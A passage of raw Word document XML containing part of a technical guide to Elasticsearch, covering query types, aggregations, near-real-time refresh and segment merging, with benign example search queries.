    </w:p>
    <w:p w14:paraId="2C0EB866" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   - Store original _source JSON (for returning in results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4D8CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>3. Write to translog (durability — like WAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BE0FB5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>4. Document is searchable after next "refresh" (default: 1 second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D676C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>5. Replicate to replica shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F257DD0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Query Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C587DD6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full-text search (scored, relevance-ranked):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E05C73" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F477C39" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>GET /products/_search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14756562" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BF2FCC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "query": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F99A517" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    "match": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F201F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      "description": "apple smartphone titanium"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30602B04" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745F058D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64EEE6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472DF759" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Analyzes query text, finds matching documents, scores by BM25 relevance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4976ECAB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Term query (exact match, not analyzed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72624611" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26F43C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54747797" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "query": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131CB4E0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    "term": { "category": "electronics" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53A0C2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564B12D5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E65D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Exact match on keyword field — no analysis, no scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3601F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bool query (compound — combining conditions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F602D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D724EE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B094DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "query": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B5998" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    "bool": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8F35C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      "must": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645CF3C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        { "match": { "title": "iphone" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D00ED96" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A77A99" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      "filter": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F16F0A9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        { "range": { "price": { "gte": 500, "lte": 1500 } } },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1B5C42" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        { "term": { "category": "electronics" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAF3A27" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F56AC7B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      "should": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23BB01" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        { "match": { "tags": "5g" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CA0AC8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C3FF8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      "must_not": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFEF878" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        { "term": { "status": "discontinued" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068ED23D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30241BF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7450C5B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BDDD2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA6C72" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>must:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Document MUST match (contributes to score). </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>filter:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Document MUST match (no scoring — cacheable, faster). </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>should:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> SHOULD match (boosts score if matches). </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>must_not:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> MUST NOT match (excludes documents).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7F4999" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.3 Aggregations (Analytics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273759E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118105A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>GET /products/_search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC1BDFE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA27E35" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "size": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D09549" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "aggs": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFC1027" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    "category_breakdown": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D045ABF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      "terms": { "field": "category", "size": 10 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A1C2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      "aggs": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B75BBC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        "avg_price": { "avg": { "field": "price" } },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C472B78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        "price_ranges": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B4ADA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">          "range": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46533FC6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">            "field": "price",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C259B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">            "ranges": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8593B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">              { "to": 50 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76841C87" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">              { "from": 50, "to": 200 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45474DC5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">              { "from": 200 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F599A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D5D62" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13145CC9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3838E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEAC981" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C415BCB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B2D07" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB1473" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Returns:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Count of products per category, average price per category, price distribution — computed across billions of documents in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C4E61" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Elasticsearch Performance Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97A777" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Near Real-Time (NRT) Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B008455" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE16D58" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Write → Translog (immediate, durable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2CB936" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      → In-memory buffer (not yet searchable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACA2A5A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="68C7A173" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Every 1 second ("refresh"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D89A233" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  In-memory buffer → new Lucene segment (now searchable!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34206E2C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  But segment is not yet fsync'd to disk (just in OS page cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F5A2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="42A3B2DD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Every 30 minutes ("flush" / commit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D119072" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Fsync all segments to disk + clear translog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF15D1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A54D9CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Result: Documents become searchable within ~1 second of indexing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4434765F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (Not instant, but "near real-time")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BADFFBE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Segment Merging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38DEB6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C4B8EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Over time: many small segments accumulate (one per refresh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF6F02E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Background merge: combine small segments into larger ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68E243" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="78BCFE1A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Benefits of merging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D1C84" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Fewer segments = fewer file handles, less memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EBAB2D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Deleted documents physically removed (segments are immutable — deletes mark, don't remove)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D12B22A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Better compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149E6C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B271AF7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Cost: I/O during merge (can be throttled: indices.store.throttle.max_bytes_per_sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464231D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Scaling Reads and Writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747E390D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295F99EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Writes scale with primary shards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A078F4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
